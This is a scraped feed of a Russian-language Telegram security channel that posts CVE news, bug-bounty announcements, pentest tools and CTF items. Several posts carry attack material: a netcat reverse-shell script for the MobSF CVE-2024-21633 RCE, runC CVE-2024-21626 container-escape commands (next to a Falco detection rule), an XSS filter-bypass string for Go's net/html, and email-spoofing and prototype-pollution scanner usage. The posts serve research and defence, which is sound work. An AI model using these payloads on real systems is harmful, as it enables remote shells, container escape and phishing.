Похек
17K subscribers
2.13K photos
111 videos
243 files
3.09K links
All materials published on the channel are for educational and informational purposes only.

Мнение автора ≠ мнение компании, где работает автор

Чат: @poxek_chat

Реклама: @szybnev или
https://telega.in/c/poxek

РКН: https://clck.ru/3FsVhp
Download Telegram
Forwarded from SecuriXy.kz
#CVE-2024-21633 - #MobSF Remote code execution (#RCE)

MobSF - статический анализатор приложений: Android, Apple iOS и Windows Phone и динамический анализ: только приложения Android.

Пересобрав приложение с ночинкой в res/raw/jadx к примерутакого содержания:


#!/bin/bash
nc host.docker.internal 9001 -e sh

Можно получить реверс шелл с хоста на котором стоит анализатор, из-за фичи самого MobSF который позволяет записать что угодно по относительному пути ${decode target path}/res/

https://www.qu35t.pw/posts/2024-21633-mobsf-rce/

https://github.com/0x33c0unt/CVE-2024-21633
7
ModSecurity WAF Bypass
CVE-2024-1019


Недавно была обнаружена значительная уязвимость в ModSecurity версий 3.0.0 - 3.0.11, идентифицированная как CVE-2024-1019. Эта уязвимость, получившая оценку CVSS 8.6, представляет серьезную опасность, позволяя обойти WAF для полезной нагрузки, основанной на пути в URL-адресах запросов.
Злоумышленники могут использовать CVE-2024-1019, создавая URL-адреса запросов с кодированными в процентах вопросительными знаками (%3F). Когда ModSecurity декодирует такие URL, он ошибочно определяет позицию компонента запроса, что позволяет злоумышленнику стратегически разместить полезную нагрузку в пути URL, чтобы обойти правила ModSecurity, предназначенные для проверки компонентов пути.

Данная проблема затрагивает переменные REQUEST_FILENAME и REQUEST_BASENAME, которые используются для проверки путей. Следовательно, правила, опирающиеся на эти переменные, могут оказаться неэффективными в борьбе с этим эксплойтом.

Пользователям и интеграторам ModSecurity настоятельно рекомендуется обновиться до версии 3.0.12, в которой эта уязвимость устранена. Важно отметить, что ModSecurity v2, а именно v2.9.x, остается незатронутой этим багом.

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
12🌚11
Forwarded from Standoff 365
🔥 Positive Technologies запускает багбаунти на 60 млн рублей!

В программу Positive Dream Hunting добавлено второе недопустимое событие — внедрение закладки в код продуктов Positive Technologies.

Вознаграждение получит багхантер (или команда), который сможет разместить условно вредоносную рабочую сборку с потенциально зловредным кодом на внутреннем сервере обновлений gus.ptsecurity.com либо публичных серверах update.ptsecurity.com.

Белым хакерам, которые выполнят один или несколько шагов до потенциальной реализации недопустимого события, будет присуждаться поощрительное вознаграждение. В частности:

300–500 тыс. рублей — за преодоление сетевого периметра и закрепление на узле

3–5 млн рублей — за внедрение кода в публичный релиз продукта на этапе хранения или тестирования

Все условия программы можно найти на нашем сайте.

Кроме того, Positive Technologies увеличивает вознаграждение за реализацию первого недопустимого события — кражу денег со счетов — до 60 млн рублей. До сих пор выполнить сценарий полностью не смог ни один багхантер.

😏 Испытать свои силы можно здесь: https://bugbounty.standoff365.com/programs/ptsecurity_ns/
6🌚21
Учимся ломать мобилки с Frida Labs
#мобилки #mobile_pentest

Когда-то я выложил супер залётный мем, который собрал по меньшей мере 18к просмотров без учетов того момента, когда у меня его своровали. И кроме того, что шутить про мобилки я только знаю какие ЯП/фреймворки используются и базовые тулзы. Но если вам по работе надо изучить мобилки или вы только учитесь и решили выбрать это очень интересное направление где сильно меньше конкуренции, чем в вебе. Frida является основополагающим инструментом при пентесте мобилки. Если ты ранее не пользовался Frida то тебе очень полезна будет Frida Labs.

Содержание репозитория:
Challenge 0x1 : Frida setup, Hooking a method
Challenge 0x2 : Calling a static method
Challenge 0x3 : Changing the value of a variable
Challenge 0x4 : Creating a class instance
Challenge 0x5 : Invoking methods on an existing instance
Challenge 0x6 : Invoking a method with an object argument
Challenge 0x7 : Hooking the constructor
Challenge 0x8 : Introduction to native hooking
Challenge 0x9 : Changing the return value of a native function
Challenge 0xA : Calling a native function
Challenge 0xB : Patching instructions using X86Writer and ARM64Writer

Полезные ресурсы от автора репы:
https://learnfrida.info/advanced_usage
https://codeshare.frida.re

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
11🌚221
Ultimate_Flipper_Zero_CheatSheet_Hack_&_Secure_InfoSec_Write_ups.pdf
3.6 MB
Признайтесь честно, у кого Flipper лежит в шкафу/полке и просто пылиться?
#полезное

🔥 Всем обладателям флипера советую почитать: The Ultimate Guide / CheatSheet to Flipper Zero

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
11
Привет, охотники!

Мы с приятными новостями: повысили награды в направлении «Умные устройства с Алисой» и заодно обновили приоритеты по устройствам. За критичные отчёты теперь можно получить до 1 млн рублей

За что можно получить такую награду? Например, если вы смогли найти способ удалённо выполнять команды на новой колонке и поморгать светодиодами :)

А если сценарий эксплуатации потребует участия пользователя или локальный доступ к устройству — то такая находка попадёт в категорию, где критичность ниже.

Впрочем, в скоупе программы не только сами устройства и их прошивки, но и сопутствующие веб-сервисы. Так что попробовать поискать баги смогут не только реверсеры и исследователи железа, но и любители веба — и найти что-то на стыке офлайна с онлайном ;)

Удачной охоты! 🔥
Please open Telegram to view this post
VIEW IN TELEGRAM
1
А вы проверяете DNS записи? (DNSSEC привет)

🌱 Давайте разберем что мы сможем найти, если будет их проверять. Самое вкусное, если у будут отсутствовать SPF и DMARC, это победа на 90%. Но давайте сначала разберем, что это за DNS записи.

1️⃣ SPF — это стандарт, который позволяет владельцам доменов указать, какие почтовые серверы авторизованы для отправки почты от их имени. Запись SPF публикуется в DNS в виде TXT-записи и содержит список IP-адресов, которые разрешены отправлять письма от имени домена. Когда почтовый сервер получает входящее сообщение, он может проверить SPF-запись отправителя, чтобы убедиться, что IP-адрес, с которого было отправлено сообщение, авторизован. Если сообщение было отправлено с сервера, не включенного в SPF-запись, оно может быть отмечено как подозрительное или отклонено.

2️⃣ DMARC — это стандарт, который позволяет владельцу домена указать, какие меры должны быть приняты, если сообщение не прошло проверку SPF или DKIM (еще один стандарт аутентификации). Запись DMARC также публикуется в DNS как TXT-запись и указывает политику, которая должна использоваться для обработки нелегитимных сообщений, а также адрес электронной почты для отправки отчетов о письмах, которые не прошли проверку.

➡️ Как итог мы получаем возможность отправлять email'ы от лица другой компании. Но скоупы у нас частенько составляют больше 20 доменов и проверять всё руками как-то не очень.

🔧 Поэтому делюсь с вами классной тулзой, которая автоматизирует эту рутинную задачу - Spoofy. Инструмент проверяет можно ли спуфать электронную почту на основе SPF и DMARC записей.

Предустановка:
git clone https://github.com/MattKeeley/Spoofy; cd Spoofy; pip3 install -r requirements.txt


Установка максимально простая:
./spoofy.py -d [DOMAIN] -o [stdout or xls]

./spoofy.py -iL [DOMAIN_LIST] -o [stdout or xls]


Тулза подходит для 🔴 🔵 команд

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
1
Forwarded from Заметки Слонсера (Slonser)
Уже в эти выходные моя команда проводит GoldCTF 2024.
Будет очень сложный Attack/Defence, приглашаю всех поучаствовать.
https://ctftime.org/event/2249
Forwarded from Blue (h/c)at Café (Женя Белкин '";DROP DATABASE db_name();--)
🖼️ Container security или почему нужно следить не только за уязвимостями в коде

Немного отвлекусь от повседневности и хочу рассказать про то, как нам важно иметь безопасные контейнеры. Начну с того, что Вам и так известно, недавно был найден скоуп уязвимостей Docker и runC.

Для начала что это за уязвимости:

🟡 CVE-2024–21626 (CVSSv3: 8.6) — Проблема в runC, связанная с process.cwd и утечкой дескрипторов файлов.
🟡 CVE-2024–23651 (CVSSv3: 8.7) — Состояние гонки во время сборки, приводящее к выходу контейнера из строя в BuildKit.
🟡 CVE-2024–23652 (CVSSv3: 10.0) — Произвольное удаление при разрушении контейнера во время сборки BuildKit.
🟡 CVE-2024–23653 (CVSSv3: 9.8) — Проблема проверки привилегий GRPC SecurityMode в BuildKit, приводящая к выходу контейнера из строя во время сборки.

При подготовке поста мне очень понравилось читать исследование про CVE-2024–21626, прошу всех с ним ознакомиться - ТЫК

Могу сделать отдельный перевод в teletype 🚶‍♀️


CVE-2024-21626, в частности, привлекла внимание к уязвимостям в runC, ключевом компоненте различных систем управления контейнерами с открытым исходным кодом. Эта уязвимость, а также ее аналоги в BuildKit подчеркивают проблемы, связанные с обеспечением безопасности контейнеров и всей современной микросервисной инфраструктуре.

🤨Да кто этот ваш такой RunC?

RunC - это стандартное время выполнения контейнеров. Это базовая технология, используемая в Docker и других платформах для запуска контейнеров. По сути, runC отвечает за порождение и запуск контейнеров в соответствии со спецификацией Open Container Initiative (OCI). Для этого он предоставляет интерфейс командной строки для управления жизненным циклом контейнеров.

Суть CVE-2024-21626 заключается в утечке дескриптора файла в пакете runC. Эта проблема возникает во время выполнения контейнерного кода. Хотя пользователи обычно устанавливают закрытие дескрипторов файлов при выполнении (O_CLOEXEC) для предотвращения утечки, уязвимость существует в том, как runC обрабатывает системный вызов setcwd(2). Сложно, непонятно, но вот ссылки на видосы исполнения от Snyk ТЫК и на гите ТЫК

⌨️ Как ломать (Для RedTeam)

Эксплойт через запуск контейнера
Нет необходимости создавать собственный образ, просто запустите контейнер с параметром -w:
docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm


Эксплоит через выполнение в запущенном контейнере:
~/container/runc/runc --version
docker run --name helper-ctr alpine
docker export helper-ctr --output alpine.tar
mkdir rootfs
tar xf alpine.tar -C rootfs
~/container/runc/runc spec
sed -ri 's#(\s*"cwd": )"(/)"#\1 "/proc/self/fd/7"#g' config.json
grep cwd config.json
sudo ~/container/runc/runc --log ./log.json run demo


🛡 Как обнаружить (Для BlueTeam)
Эксплойты имеют следующие особенности:
Контейнер запускает процесс execve(2) со специальным рабочим каталогом, который начинается с /proc/self/fd/.
Контейнер создает символические ссылки через symlink(2) или symlinkat(2) со специальной ссылкой на целевой каталог, который начинается с /proc/self/fd/.
Контейнер будет открывать файлы с помощью open(2), openat(2) или openat2(2) с именами типа /proc/\d+/cwd/.*.

Правило для Falco — про него выйдет отдельный пост
- macro: container
condition: (container.id != host and container.name exists)

- rule: CVE-2024-21626 (runC escape through /proc/[PID]/cwd) exploited
desc: >
Detect CVE-2024-21626, runC escape vulerability through /proc/[PID]/cwd.
condition: >
container and ((evt.type = execve and proc.cwd startswith "/proc/self/fd") or (evt.type in (open, openat, openat2) and fd.name glob "/proc/*/cwd/*") or (evt.type in (symlink, symlinkat) and fs.path.target startswith "/proc/self/fd/")) and proc.name != "runc:[1:CHILD]"
output: CVE-2024-21626 exploited (%container.info evt_type=%evt.type process=%proc.name command=%proc.cmdline target=%fs.path.targetraw)
priority: CRITICAL


Это первая часть поста, телега не позволяет дать больше информации. Вторая часть выйдет завтра, в 15:00
Всех ждем на продолжение на уязвимости CVE-2024–23651, CVE-2024–23652, CVE-2024–23653 🤗
Please open Telegram to view this post
VIEW IN TELEGRAM
165
История о багах и о том, как фикс одних багов, создает новые баги 😂

Много видел постов про суперкритичную вулну в Ivanti. В целом интересная уязвимость, но это только верхушка айсберга.

Поэтому решил поделиться не просто PoC, но и ресерчом от AttackerKB (создатели metasploit). Они интересно и понятно объясни, как нашли и как работает злополучная SSRF в Ivanti Connect Secure, Ivanti Policy Secure, Ivanti Neurons for ZTA.

Но начнем мы не с CVE-2024-21893, а сделаем несколько шагов назад)

0️⃣ История с Ivanti началась с CVE-2023-46805, это был authentication bypass. Импакт очевиден, но ресерчеры на этом не остановились.

1️⃣ Далее они нашли command injection CVE-2024-21887. Это было вкуснее, к тому же чейнилось с предыдущей вулной на обход аутентификации. Что вылилось в unauthenticated RCE.

2️⃣ Ivanti пофиксили эти две CVE. Но официального патча на момент ещё не вышел.

3️⃣ Затем вышел официальный патч 1 февраля, но ресерчеры успели найти ту самую SSRF CVE-2024-21893 на день раньше, то бишь 31 января). Данная SSRF позволяет обойти патч двух предыдущих CVE (CVE-2023-46805 & CVE-2024-21887).

Есть ли в итоге исправление?
Да, конечно. В актуальной версии 22.5R2.2, на момент написания статьи, данные уязвимости были устранены. Но если у вас Ivanti Connect Secure 22.3R1 или старше, то рекомендую обновиться до актульной версии ASAP.

➡️ А для тех, кто хочет ещё глубже погрузится в этом, советую почитать полный ресерч.

Итог истории очевиден. Фикся одни баги, создаем другие)
🥺 Stay secure!

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
152
Forwarded from AP Security
#pentest #redteam

Идеальный DLL Hijacking🖥

Команда AP Security подготовила для Вас очередную статью, в которой подробно будет рассмотрено исследование такой техники, как DLL Hijacking. Статья подробно расскажет, как работает данный механизм и как его эксплуатировать

Хабр
Please open Telegram to view this post
VIEW IN TELEGRAM
114🌚32
Forwarded from Заметки Слонсера (Slonser)
Недавно нашел обход фильтрации тегов в golang.
Для строки <a/href/='https://google.com/#><img src=x onerror=alert()>slon</img></h1>'>google</a>, golang net/html увидит следующий DOM:
  html
head
body
a
->href: https://google.com/#><img src=x onerror=alert()>slon</img></h1>

То есть он будет думать что у нас есть только ссылка на google.com
В тоже время в браузере вы увидите, что у нас загрузился тег <img> и всплыл popup alert
Баг существует в последней версии golang и будет исправлен в next релизе.
12🌚4
Что общего у 50-секундного детектива, баскетболистов и разработки фишинговых атак
#история #фишинг

Спойлерить статью не буду, но редактор очень креативно подошла к теме Awareness. Поэтому всем советую почитать эту статью)

➡️ Читать далее

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
9🌚3
Forwarded from Багхантер
😎 Поступила инфа, что 18 апреля у VK намечается закрытая тусовка для багхантеров.

А еще узнали про условие, как туда можно попасть: любой багхантер, который сдаст четыре и более оплачиваемых отчета по программам VK на платформе Standoff 365 в срок с 12 февраля по 11 апреля, — получит приглашение на ивент.

А чтобы искать уязвимости было еще интереснее, VK увеличивает выплаты по программам: VK Play, Чемпионаты VK, VK Реклама, VK Pay и Оператор рекламных данных.

Сделай дело — туси смело: https://bugbounty.standoff365.com/vendors/vk/
8
Forwarded from BI.ZONE Bug Bounty
🪲 Сдавайте баги, чтобы попасть на закрытый ивент VK

Скоро VK проведет закрытое мероприятие для багхантеров. Пока никаких спойлеров: компания сама расскажет все подробности.

Зато уже сейчас у вас есть шанс получить проходку на ивент. Для этого нужно сдать как минимум четыре оплачиваемых бага с 12 февраля по 11 апреля. Успейте принять участие: количество мест ограниченно!

Но это еще не все: чтобы багхантить было приятнее, с 12 февраля VK повышает выплаты в своих программах.

🔵VK Pay — до 1,8 млн руб.
🔵Чемпионаты VK, «VK Реклама» — до 600 тыс. руб.
🔵VK Play, Оператор рекламных данных — до 360 тыс. руб.

Перейти на платформу
Please open Telegram to view this post
VIEW IN TELEGRAM
12
0 == "0" — TRUE

❤️ Prototype Pollution — это атака, с помощью которой изменяют прототип базовых объектов (Object.prototype, Function.prototype, Array.prototype) для модификации хода выполнения программы. Например, если код обращается к свойству window.foo и выполняет его содержимое с помощью eval, то в некоторых ситуациях можно добиться выполнения произвольного кода, переписав в прототипе объекта свойство foo (Object.prototype.foo = 'alert(1)'). Чаще всего на клиенте prototype pollution используется для реализации XSS с помощью изменения GET-параметров.

➡️ Тут можете более подробно почитать про Prototype Pollution

❤️ Но как же я могу вас оставить без автоматизации))

pphack

Прокаченный сканер на Prototype Pollution.

Установка:
go install github.com/edoardottt/pphack/cmd/pphack@latest


FAQ:
Usage:
pphack [flags]

Flags:
INPUT:
-u, -url string Input URL
-l, -list string File containing input URLs

CONFIGURATION:
-c, -concurrency int Concurrency level (default 50)
-t, -timeout int Connection timeout in seconds (default 10)
-px, -proxy string Set a proxy server (URL)
-rl, -rate-limit int Set a rate limit (per second)
-ua, -user-agent string Set a custom User Agent (random by default)

SCAN:
-p, -payload string Custom payload
-js, -javascript string Run custom Javascript on target
-jsf, -javascript-file string File containing custom Javascript to run on target

OUTPUT:
-o, -output string File to write output results
-v, -verbose Verbose output
-s, -silent Silent output. Print only results


Использование:
pphack -u https://edoardottt.github.io/pp-test/

pphack -l targets.txt

также вы можете встроить его в свой pipeline
echo https://edoardottt.github.io/pp-test/ | pphack

cat targets.txt | pphack


❤️ #You_have_been_poxeked

🌚 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
128
Книга Хакерство. Секреты Мастерства
Библиотека журнала Xakep
Издание 2024 года

🔓 @poxek
Please open Telegram to view this post
VIEW IN TELEGRAM
28
Forwarded from CTF News
Пс-с, тут отчет по Gold CTF подвезли!

Еще раз поздравляем команду kks с заслуженной победой. Напоминаем, что ребята выиграли по тройской унции золота на каждого тиммейта 🔥

Отчет на сайте
Репозиторий
12
Forwarded from Cyber Media
⌨️Туннельное мышление: зачем pivoting пентестеру

Пивотинг — это набор техник, которые позволяют атакующему получить доступ к внутренним ресурсам, минуя сетевые средства защиты.

➡️ В новой статье на сайте Сергей Зыбнев, автор Telegram-канала «Похек», рассказал об инструментах пивотинга и примерах их применения на проектах по пентесту.
Please open Telegram to view this post
VIEW IN TELEGRAM
1622